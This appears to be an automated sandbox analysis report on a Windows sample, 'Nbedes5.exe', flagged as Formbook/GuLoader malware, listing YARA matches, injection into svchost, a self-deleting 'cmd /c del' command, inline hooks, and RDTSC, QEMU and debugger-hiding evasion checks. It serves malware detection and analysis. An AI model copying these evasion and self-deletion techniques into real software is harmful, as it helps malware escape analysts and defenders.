      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C79EEA NtCreateFile,14_2_02C79EEA
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C79FE2 NtReadFile,14_2_02C79FE2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C79F2A NtCreateFile,14_2_02C79F2A
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_021F02A9
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E256E30
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E26EBB0
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2F1002
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E24841F
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E24B090
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E230D20
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E254120
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E23F900
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E301D55
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E24D5E0
      Source: C:\Windows\explorer.exe | Code function: 5_2_0614BA52
      Source: C:\Windows\explorer.exe | Code function: 5_2_0614EA0C
      Source: C:\Windows\explorer.exe | Code function: 5_2_06142072
      Source: C:\Windows\explorer.exe | Code function: 5_2_06142069
      Source: C:\Windows\explorer.exe | Code function: 5_2_0614A882
      Source: C:\Windows\explorer.exe | Code function: 5_2_06143CF2
      Source: C:\Windows\explorer.exe | Code function: 5_2_06143CE9
      Source: C:\Windows\explorer.exe | Code function: 5_2_06146B1F
      Source: C:\Windows\explorer.exe | Code function: 5_2_06146B22
      Source: C:\Windows\explorer.exe | Code function: 5_2_06149152
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_0325EBB0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03246E30
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03220D20
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_03244120
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_0322F900
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_032F1D55
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_032E1002
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_0323841F
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_0323B090
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C7E1AE
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C69E40
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C69E3B
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C62FB0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C7E77F
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C7EC93
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C62D87
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C62D90
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: String function: 1E23B150 appears 32 times
      Source: Nbedes5.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Nbedes5.exe, 00000002.00000002.337439996.000000001E32F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Nbedes5.exe
      Source: Nbedes5.exe, 00000002.00000002.336680926.000000001DEDB000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamesvchost.exej% vs Nbedes5.exe
      Source: Nbedes5.exe, 00000002.00000002.336629279.000000001DD80000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Nbedes5.exe
      Source: 00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.506793601.000000000372F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000002.00000002.330459852.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.330459852.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.502533038.0000000002C60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.502533038.0000000002C60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.498831427.0000000000180000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.498831427.0000000000180000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@7/0@3/2
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_01
      Source: Nbedes5.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Nbedes5.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\Nbedes5.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: Nbedes5.exe | Virustotal: Detection: 11%
      Source: unknown | Process created: C:\Users\user\Desktop\Nbedes5.exe 'C:\Users\user\Desktop\Nbedes5.exe'
      Source: unknown | Process created: C:\Users\user\Desktop\Nbedes5.exe 'C:\Users\user\Desktop\Nbedes5.exe'
      Source: unknown | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
      Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nbedes5.exe'
      Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Nbedes5.exe | Process created: C:\Users\user\Desktop\Nbedes5.exe 'C:\Users\user\Desktop\Nbedes5.exe'
      Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nbedes5.exe'
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.316273761.000000000E2B0000.00000002.00000001.sdmp
      Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000005.00000000.316954969.000000000F6E3000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: Nbedes5.exe, 00000002.00000002.337439996.000000001E32F000.00000040.00000001.sdmp, svchost.exe, 0000000E.00000002.504009556.0000000003200000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Nbedes5.exe, svchost.exe
      Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000005.00000000.316954969.000000000F6E3000.00000004.00000001.sdmp
      Source: Binary string: svchost.pdb source: Nbedes5.exe, 00000002.00000002.336655250.000000001DED0000.00000040.00000001.sdmp
      Source: Binary string: svchost.pdbUGP source: Nbedes5.exe, 00000002.00000002.336655250.000000001DED0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.316273761.000000000E2B0000.00000002.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match | File source: Process Memory Space: Nbedes5.exe PID: 5492, type: MEMORY
      Source: Yara match | File source: Process Memory Space: Nbedes5.exe PID: 780, type: MEMORY
      Yara detected VB6 Downloader Generic
      Source: Yara match | File source: Process Memory Space: Nbedes5.exe PID: 5492, type: MEMORY
      Source: Yara match | File source: Process Memory Space: Nbedes5.exe PID: 780, type: MEMORY
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_0040461D push edx; iretd 0_2_004045ED
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_00405E1F pushfd ; retf 0_2_00405F94
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_00403691 push B35EBC04h; ret 0_2_00403696
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_004064AF pushad ; ret 0_2_004064CA
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_00405740 pushad ; iretd 0_2_0040573E
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_0040575D pushad ; iretd 0_2_0040573E
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_00403B05 push 2B54F807h; ret 0_2_00403B0A
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_0040570A pushad ; iretd 0_2_0040573E
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_0040630F pushfd ; retf 0_2_00406320
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_004067CE push edx; ret 0_2_004067D6
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_004045E4 push edx; iretd 0_2_004045ED
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_00405FA7 pushfd ; retf 0_2_00405F94
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E28D0D1 push ecx; ret 2_2_1E28D0E4
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_0327D0D1 push ecx; ret 14_2_0327D0E4
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C6E2C3 push ecx; retf 14_2_02C6E2C6
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C68286 push ds; retf 14_2_02C6828A
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C7DABE push esi; ret 14_2_02C7DACE
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C76B0F push edx; ret 14_2_02C76B1E
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C7D0D2 push eax; ret 14_2_02C7D0D8
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C7D0DB push eax; ret 14_2_02C7D142
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C7D085 push eax; ret 14_2_02C7D0D8
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C70854 push FFFFFFFDh; iretd 14_2_02C70856
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C7E186 push dword ptr [B2588A5Eh]; ret 14_2_02C7E1A6
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C7E109 push ss; retf 14_2_02C7E113
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C7D13C push eax; ret 14_2_02C7D142
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 14_2_02C7A796 push eax; retf 14_2_02C7A79C

      Hooking and other Techniques for Hiding and Protection:

      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE4
      Source: C:\Users\user\Desktop\Nbedes5.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Nbedes5.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Nbedes5.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\user\Desktop\Nbedes5.exe | RDTSC instruction interceptor: First address: 00000000021F40DA second address: 00000000021F40DA instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F7C70391478h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f cmp dl, cl 0x00000021 pop ecx 0x00000022 test edi, 83F80AC1h 0x00000028 add edi, edx 0x0000002a test ch, bh 0x0000002c dec ecx 0x0000002d cmp ecx, 00000000h 0x00000030 jne 00007F7C70391456h 0x00000032 cmp dh, FFFFFFAEh 0x00000035 push ecx 0x00000036 call 00007F7C70391496h 0x0000003b call 00007F7C7039148Ah 0x00000040 lfence 0x00000043 mov edx, dword ptr [7FFE0014h] 0x00000049 lfence 0x0000004c ret 0x0000004d mov esi, edx 0x0000004f pushad 0x00000050 rdtsc
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\Nbedes5.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Nbedes5.exe | File opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\Nbedes5.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Nbedes5.exe | File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: Nbedes5.exe | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\Nbedes5.exe | RDTSC instruction interceptor: First address: 00000000021F40DA second address: 00000000021F40DA instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F7C70391478h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f cmp dl, cl 0x00000021 pop ecx 0x00000022 test edi, 83F80AC1h 0x00000028 add edi, edx 0x0000002a test ch, bh 0x0000002c dec ecx 0x0000002d cmp ecx, 00000000h 0x00000030 jne 00007F7C70391456h 0x00000032 cmp dh, FFFFFFAEh 0x00000035 push ecx 0x00000036 call 00007F7C70391496h 0x0000003b call 00007F7C7039148Ah 0x00000040 lfence 0x00000043 mov edx, dword ptr [7FFE0014h] 0x00000049 lfence 0x0000004c ret 0x0000004d mov esi, edx 0x0000004f pushad 0x00000050 rdtsc
      Source: C:\Users\user\Desktop\Nbedes5.exe | RDTSC instruction interceptor: First address: 00000000021F40FC second address: 00000000021F40FC instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F7C70395120h 0x0000001f popad 0x00000020 call 00007F7C70394D75h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Nbedes5.exe | RDTSC instruction interceptor: First address: 00000000005640FC second address: 00000000005640FC instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F7C70391880h 0x0000001f popad 0x00000020 call 00007F7C703914D5h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Nbedes5.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Nbedes5.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\svchost.exe | RDTSC instruction interceptor: First address: 0000000002C698E4 second address: 0000000002C698EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\svchost.exe | RDTSC instruction interceptor: First address: 0000000002C69B5E second address: 0000000002C69B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_021F02A9 rdtsc 0_2_021F02A9
      Source: C:\Windows\explorer.exe TID: 6156 | Thread sleep time: -46000s >= -30000s
      Source: C:\Windows\SysWOW64\svchost.exe TID: 7132 | Thread sleep time: -36000s >= -30000s
      Source: C:\Windows\explorer.exe | Last function: Thread delayed
      Source: C:\Windows\explorer.exe | Last function: Thread delayed
      Source: C:\Windows\SysWOW64\svchost.exe | Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: explorer.exe, 00000005.00000000.310420433.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: explorer.exe, 00000005.00000000.307774949.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
      Source: explorer.exe, 00000005.00000000.310420433.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000005.00000002.523167988.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: Nbedes5.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000005.00000000.307774949.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Heartbeat Service
      Source: explorer.exe, 00000005.00000000.312839969.0000000008907000.00000004.00000001.sdmp | Binary or memory string: #{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&I
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
      Source: explorer.exe, 00000005.00000000.310420433.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
      Source: explorer.exe, 00000005.00000000.310197590.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmp | Binary or memory string: vmicshutdown
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
      Source: Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmp | Binary or memory string: vmicvss
      Source: explorer.exe, 00000005.00000000.295484560.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
      Source: explorer.exe, 00000005.00000000.310420433.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
      Source: explorer.exe, 00000005.00000000.310542436.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
      Source: explorer.exe, 00000005.00000000.307774949.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Data Exchange Service
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Service Interface
      Source: Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmp | Binary or memory string: vmicheartbeat
      Source: explorer.exe, 00000005.00000000.307774949.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\Nbedes5.exe | Process information queried: ProcessInformation

      Anti Debugging:

      Contains functionality to hide a thread from the debugger
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_021F02A9 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000 0_2_021F02A9
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\Nbedes5.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Nbedes5.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Nbedes5.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Nbedes5.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\Nbedes5.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\Nbedes5.exe | Process queried: DebugPort
      Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_021F02A9 rdtsc 0_2_021F02A9
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_021F24FB LdrInitializeThunk, 0_2_021F24FB
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_021F4561 mov eax, dword ptr fs:[00000030h] 0_2_021F4561
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_021F223C mov eax, dword ptr fs:[00000030h] 0_2_021F223C
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_021F184B mov eax, dword ptr fs:[00000030h] 0_2_021F184B
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_021F3E60 mov eax, dword ptr fs:[00000030h] 0_2_021F3E60
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_021F46A3 mov eax, dword ptr fs:[00000030h] 0_2_021F46A3
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_021F174A mov eax, dword ptr fs:[00000030h] 0_2_021F174A
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_021F3B46 mov eax, dword ptr fs:[00000030h] 0_2_021F3B46
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 0_2_021F11CC mov eax, dword ptr fs:[00000030h] 0_2_021F11CC
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E23E620 mov eax, dword ptr fs:[00000030h] 2_2_1E23E620
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2EFE3F mov eax, dword ptr fs:[00000030h] 2_2_1E2EFE3F
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E23C600 mov eax, dword ptr fs:[00000030h] 2_2_1E23C600
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E23C600 mov eax, dword ptr fs:[00000030h] 2_2_1E23C600
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E23C600 mov eax, dword ptr fs:[00000030h] 2_2_1E23C600
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E253A1C mov eax, dword ptr fs:[00000030h] 2_2_1E253A1C
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E26A61C mov eax, dword ptr fs:[00000030h] 2_2_1E26A61C
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E26A61C mov eax, dword ptr fs:[00000030h] 2_2_1E26A61C
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E24766D mov eax, dword ptr fs:[00000030h] 2_2_1E24766D
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2EB260 mov eax, dword ptr fs:[00000030h] 2_2_1E2EB260
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E2EB260 mov eax, dword ptr fs:[00000030h] 2_2_1E2EB260
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E308A62 mov eax, dword ptr fs:[00000030h] 2_2_1E308A62
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E25AE73 mov eax, dword ptr fs:[00000030h] 2_2_1E25AE73
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E25AE73 mov eax, dword ptr fs:[00000030h] 2_2_1E25AE73
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E25AE73 mov eax, dword ptr fs:[00000030h] 2_2_1E25AE73
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E25AE73 mov eax, dword ptr fs:[00000030h] 2_2_1E25AE73
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E25AE73 mov eax, dword ptr fs:[00000030h] 2_2_1E25AE73
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E27927A mov eax, dword ptr fs:[00000030h] 2_2_1E27927A
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E239240 mov eax, dword ptr fs:[00000030h] 2_2_1E239240
      Source: C:\Users\user\Desktop\Nbedes5.exe | Code function: 2_2_1E239240 mov eax, dword ptr fs:[00000030h] 2_2_1E239240
